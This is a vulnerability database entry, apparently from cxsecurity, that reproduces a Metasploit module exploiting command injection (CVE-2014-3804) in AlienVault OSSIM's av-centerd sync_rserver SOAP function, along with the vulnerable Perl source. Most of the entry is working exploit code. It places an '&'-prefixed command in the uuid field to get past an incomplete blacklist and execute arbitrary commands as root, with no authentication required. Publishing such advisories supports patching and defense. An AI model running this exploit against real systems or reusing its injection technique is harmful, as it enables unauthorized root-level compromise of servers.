Alienvault OSSIM av-centerd Util.pm sync_rserver Command Execution

2017.09.13
Credit: james fitts
Risk: High
Local: No
Remote: No
CWE: CWE-78


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

require 'msf/core' class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize super( 'Name' => 'Alienvault OSSIM av-centerd Util.pm sync_rserver Command Execution', 'Description' => %q{ This module exploits a command injection vulnerability found within the sync_rserver function in Util.pm. The vulnerability is triggered due to an incomplete blacklist during the parsing of the $uuid parameter. This allows for the escaping of a system command allowing for arbitrary command execution as root }, 'References' => [ [ 'CVE', '2014-3804' ], [ 'ZDI', '14-197' ], [ 'URL', 'http://forums.alienvault.com/discussion/2690' ], ], 'Author' => [ 'james fitts' ], 'License' => MSF_LICENSE, 'DisclosureDate' => 'Jun 11 2014') register_options([ Opt::RPORT(40007), OptBool.new('SSL', [true, 'Use SSL', true]), OptString.new('CMD', [ false, 'This is the file to download', 'touch /tmp/file.txt']) ], self.class) end def run soap = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n" soap += "<soap:Envelope xmlns:soap=\"http:\/\/schemas.xmlsoap.org/soap/envelope/\"\r\n" soap += "xmlns:soapenc=\"http:\/\/schemas.xmlsoap.org\/soap\/encoding/\" xmlns:xsd=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\r\n" soap += "xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\r\n" soap += "soap:encodingStyle=\"http:\/\/schemas.xmlsoap.org\/soap\/encoding\/\">\r\n" soap += "<soap:Body>\r\n" soap += "<sync_rserver xmlns=\"AV\/CC\/Util\">\r\n" soap += "<c-gensym3 xsi:type=\"xsd:string\">All</c-gensym3>\r\n" soap += "<c-gensym5 xsi:type=\"xsd:string\">& #{datastore['CMD']} </c-gensym5>\r\n" soap += "<c-gensym7 xsi:type=\"xsd:string\">#{datastore['RHOST']}</c-gensym7>\r\n" soap += "<c-gensym9 xsi:type=\"xsd:string\">#{Rex::Text.rand_text_alpha(4 + rand(4))}</c-gensym9>\r\n" soap += "</sync_rserver>\r\n" soap += "</soap:Body>\r\n" soap += "</soap:Envelope>\r\n" res = send_request_cgi( { 'uri' => '/av-centerd', 'method' => 'POST', 'ctype' => 'text/xml; charset=UTF-8', 'data' => soap, 'headers' => { 'SOAPAction' => "\"AV/CC/Util#sync_rserver\"" } }, 20) if res && res.code == 200 print_good("Command executed successfully!") else print_bad("Something went wrong...") end end end __END__ /usr/share/alienvault-center/lib/AV/CC/Util.pm sub sync_rserver { my ( $funcion_llamada, $nombre, $uuid, $admin_ip, $hostname ) = @_; verbose_log_file( "SYNC RSERVER TASK : Received call from $uuid : ip source = $admin_ip, hostname = $hostname:($funcion_llamada,$nombre)" ); if ($uuid =~ /[;`\$\<\>\|]/) { console_log_file("Not allowed uuid: $uuid in sync_rserver\n"); my @ret = ("Error"); return \@ret; } my $conn = Avtools::get_database(); my $sqlfile = "/tmp/sync_${uuid}.sql"; my $sqlfile_old = "/tmp/sync_${uuid}.sql.old"; my $sqlfile_md5 = `md5sum $sqlfile | awk '{print \$1}'`; my $sqlfile_content; my $status = 1; my $counter = 0; my @ret; my $query = qq{}; my $dbq; if ( -f $sqlfile_old ) { my $sqlfile_old_md5 = `md5sum $sqlfile_old | awk '{print \$1}'`; debug_log_file ("Old MD5: $sqlfile_old_md5 New MD5: $sqlfile_md5"); if ( $sqlfile_md5 eq $sqlfile_old_md5 ) { unlink $sqlfile; verbose_log_file ("Already sync'ed!"); return "0"; } else { unlink $sqlfile_old; } } my $query_array = `ossim-db < $sqlfile 2>&1`; $query_array =~ s/[\s\n]+$//g; if ($query_array ne '') { $status = $query_array; } else { $status = 0; } if ( ! (defined $status) or $status == 0 ) { if ( grep /RESTART\sOSSIM\-SERVER/, $sqlfile ) { verbose_log_file("RESTART OSSIM-SERVER MARK found. Restarting ossim-server"); system('/etc/init.d/ossim-server restart'); } else { debug_log_file("RESTART OSSIM-SERVER MARK not found. Skipping ossim-server restart"); } $query = qq{REPLACE INTO alienvault.config (conf, value) VALUES ('latest_asset_change', utc_timestamp())}; debug_log_file($query); $dbq = $conn->prepare($query); $dbq->execute(); $dbq->finish(); } else { verbose_log_file ("Error syncing rservers: ${status}"); } debug_log_file("Move file: $sqlfile"); move ($sqlfile, $sqlfile . ".old"); # push @ret, "0"; return "0"; }


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top